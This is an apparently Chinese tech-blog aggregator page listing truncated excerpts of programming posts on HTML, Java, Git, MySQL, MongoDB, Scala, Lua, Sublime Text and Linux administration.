      第一节 HTML概要学习 1. 什么是HTML HTML是英文Hyper Text Mark-up Language(超文本标记语言)的缩写,它规定了自己的语法规则,用来表示比“文本”更丰富的意义,比如图片,表格,链接等。浏览器(IE,FireFox等)软件知道HTML语言的语法,可以用来查看HTML文档。目前互联网上的绝大部分网页都是使用HTML编写的。 打开记事本 输入一下内
    • MyEclipse里部分习惯的更改 Array_06 eclipse
      继续补充中---------------------- 1.更改自己合适快捷键windows-->prefences-->java-->editor-->Content Assist-->      Activation triggers for java的右侧“.”就可以改变常用的快捷键 选中 Text
    • 近一个月的面试总结 cugfy 面试
      本文是在学习中的总结,欢迎转载但请注明出处:http://blog.csdn.net/pistolove/article/details/46753275 前言       打算换个工作,近一个月面试了不少的公司,下面将一些面试经验和思考分享给大家。另外校招也快要开始了,为在校的学生提供一些经验供参考,希望都能找到满意的工作。 
    • HTML5一个小迷宫游戏 357029540 html5
           通过《HTML5游戏开发》摘抄了一个小迷宫游戏,感觉还不错,可以画画,写字,把摘抄的代码放上来分享下,喜欢的同学可以拿来玩玩! <html> <head> <title>创建运行迷宫</title> <script type="text/javascript"
    • 10步教你上传githib数据 张亚雄 git
      官方的教学还有其他博客里教的都是给懂的人说得,对已我们这样对我大菜鸟只能这么来锻炼,下面先不玩什么深奥的,先暂时用着10步干净利索。等玩顺溜了再用其他的方法。 操作过程(查看本目录下有哪些文件NO.1)ls (跳转到子目录NO.2)cd+空格+目录 (继续NO.3)ls (匹配到子目录NO.4)cd+ 目录首写字母+tab键+(首写字母“直到你所用文件根就不再按TAB键了”) (查看文件
    • MongoDB常用操作命令大全 adminjun mongodb操作命令
      成功启动MongoDB后,再打开一个命令行窗口输入mongo,就可以进行数据库的一些操作。输入help可以看到基本操作命令,只是MongoDB没有创建数据库的命令,但有类似的命令 如:如果你想创建一个“myTest”的数据库,先运行use myTest命令,之后就做一些操作(如:db.createCollection('user')),这样就可以创建一个名叫“myTest”的数据库。 一
    • bat调用jar包并传入多个参数 aijuans
      下面的主程序是通过eclipse写的: 1.在Main函数接收bat文件传递的参数(String[] args)  如:   String ip =args[0];          String user=args[1];       &nbs
    • Java中对类的主动引用和被动引用 ayaoxinchao java主动引用对类的引用被动引用类初始化
        在Java代码中,有些类看上去初始化了,但其实没有。例如定义一定长度某一类型的数组,看上去数组中所有的元素已经被初始化,实际上一个都没有。对于类的初始化,虚拟机规范严格规定了只有对该类进行主动引用时,才会触发。而除此之外的所有引用方式称之为对类的被动引用,不会触发类的初始化。虚拟机规范严格地规定了有且仅有四种情况是对类的主动引用,即必须立即对类进行初始化。四种情况如下:1.遇到ne
    • 导出数据库 提示 outfile disabled BigBird2012 mysql
      在windows控制台下,登陆mysql,备份数据库:   mysql>mysqldump -u root -p test test > D:\test.sql 使用命令 mysqldump 格式如下: mysqldump -u root -p *** DBNAME > E:\\test.sql。 注意:执行该命令的时候不要进入mysql的控制台再使用,这样会报
    • Javascript 中的 && 和 || bijian1013 JavaScript&&||
              准备两个对象用于下面的讨论 var alice = { name: "alice", toString: function () { return this.name; } } var smith = { name: "smith",
    • [Zookeeper学习笔记之四]Zookeeper Client Library会话重建 bit1129 zookeeper
      为了说明问题,先来看个简单的示例代码:   package com.tom.zookeeper.book; import com.tom.Host; import org.apache.zookeeper.WatchedEvent; import org.apache.zookeeper.ZooKeeper; import org.apache.zookeeper.Wat
    • 【Scala十一】Scala核心五:case模式匹配 bit1129 scala
      package spark.examples.scala.grammars.caseclasses object CaseClass_Test00 { def simpleMatch(arg: Any) = arg match { case v: Int => "This is an Int" case v: (Int, String)
    • 运维的一些面试题 yuxianhua linux
      1、Linux挂载Winodws共享文件夹   mount -t cifs //1.1.1.254/ok /var/tmp/share/ -o username=administrator,password=yourpass 或 mount -t cifs -o username=xxx,password=xxxx //1.1.1.1/a /win    
    • Java lang包-Boolean BrokenDreams boolean
               Boolean类是Java中基本类型boolean的包装类。这个类比较简单,直接看源代码吧。 public final class Boolean implements java.io.Serializable,
    • 读《研磨设计模式》-代码笔记-命令模式-Command bylijinnan java设计模式
      声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.Collection; import java.util.List; /** * GOF 在《设计模式》一书中阐述命令模式的意图:“将一个请求封装
    • matlab下GPU编程笔记 cherishLC matlab
      不多说,直接上代码 gpuDevice % 查看系统中的gpu,,其中的DeviceSupported会给出matlab支持的GPU个数。 g=gpuDevice(1); %会清空 GPU 1中的所有数据,,将GPU1 设为当前GPU reset(g) %也可以清空GPU中数据。 a=1; a=gpuArray(a); %将a从CPU移到GPU中 onGP
    • SVN安装过程 crabdave SVN
      SVN安装过程   subversion-1.6.12   ./configure --prefix=/usr/local/subversion --with-apxs=/usr/local/apache2/bin/apxs --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr --with-openssl=/
    • sql 行列转换 daizj sql行列转换行转列列转行
      行转列的思想是通过case when 来实现 列转行的思想是通过union all 来实现 下面具体例子: 假设有张学生成绩表(tb)如下: Name Subject Result 张三 语文  74 张三 数学  83 张三 物理  93 李四 语文  74 李四 数学  84 李四 物理  94 */ /* 想变成 姓名   &
    • MySQL--主从配置 dcj3sjt126com mysql
      linux下的mysql主从配置: 说明:由于MySQL不同版本之间的(二进制日志)binlog格式可能会不一样,因此最好的搭配组合是Master的MySQL版本和Slave的版本相同或者更低, Master的版本肯定不能高于Slave版本。(版本向下兼容) mysql1  : 192.168.100.1    //master mysq
    • 关于yii 数据库添加新字段之后model类的修改 dcj3sjt126com Model
      rules: array('新字段','safe','on'=>'search') 1、array('新字段', 'safe')//这个如果是要用户输入的话,要加一下, 2、array('新字段', 'numerical'),//如果是数字的话 3、array('新字段', 'length', 'max'=>100),//如果是文本 1、2、3适当的最少要加一条,新字段才会被
    • sublime text3 中文乱码解决 dyy_gusi Sublime Text
      sublime text3中文乱码解决 原因:缺少转换为UTF-8的插件 目的:安装ConvertToUTF8插件包 第一步:安装能自动安装插件的插件,百度“Codecs33”,然后按照步骤可以得到以下一段代码: import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a30980927
    • 概念了解:CGI,FastCGI,PHP-CGI与PHP-FPM geeksun PHP
      CGI CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等。 FastCGI FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行着,只要激活后,不
    • Git push 报错 "error: failed to push some refs to " 解决 hongtoushizi git
      Git push 报错 "error: failed to push some refs to " . 此问题出现的原因是:由于远程仓库中代码版本与本地不一致冲突导致的。 由于我在第一次git pull --rebase 代码后,准备push的时候,有别人往线上又提交了代码。所以出现此问题。 解决方案: 1: git pull    2:
    • 第四章 Lua模块开发 jinnianshilongnian nginxlua
      在实际开发中,不可能把所有代码写到一个大而全的lua文件中,需要进行分模块开发;而且模块化是高性能Lua应用的关键。使用require第一次导入模块后,所有Nginx 进程全局共享模块的数据和代码,每个Worker进程需要时会得到此模块的一个副本(Copy-On-Write),即模块可以认为是每Worker进程共享而不是每Nginx Server共享;另外注意之前我们使用init_by_lua中初
    • java.lang.reflect.Proxy liyonghui160com
        1.简介   Proxy 提供用于创建动态代理类和实例的静态方法 (1)动态代理类的属性 代理类是公共的、最终的,而不是抽象的 未指定代理类的非限定名称。但是,以字符串 "$Proxy" 开头的类名空间应该为代理类保留 代理类扩展 java.lang.reflect.Proxy 代理类会按同一顺序准确地实现其创建时指定的接口
    • Java中getResourceAsStream的用法 pda158 java
      1.Java中的getResourceAsStream有以下几种: 1. Class.getResourceAsStream(String path) : path 不以’/'开头时默认是从此类所在的包下取资源,以’/'开头则是从ClassPath根下获取。其只是通过path构造一个绝对路径,最终还是由ClassLoader获取资源。   2. Class.getClassLoader.get
    • spring 包官方下载地址(非maven) sinnk spring
      SPRING官方网站改版后,建议都是通过 Maven和Gradle下载,对不使用Maven和Gradle开发项目的,下载就非常麻烦,下给出Spring Framework jar官方直接下载路径:   http://repo.springsource.org/libs-release-local/org/springframework/spring/   s
    • Oracle学习笔记(7) 开发PLSQL子程序和包 vipbooks oraclesql编程
          哈哈,清明节放假回去了一下,真是太好了,回家的感觉真好啊!现在又开始出差之旅了,又好久没有来了,今天继续Oracle的学习!      这是第七章的学习笔记,学习完第六章的动态SQL之后,开始要学习子程序和包的使用了……,希望大家能多给俺一些支持啊!     编程时使用的工具是PLSQL
    按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他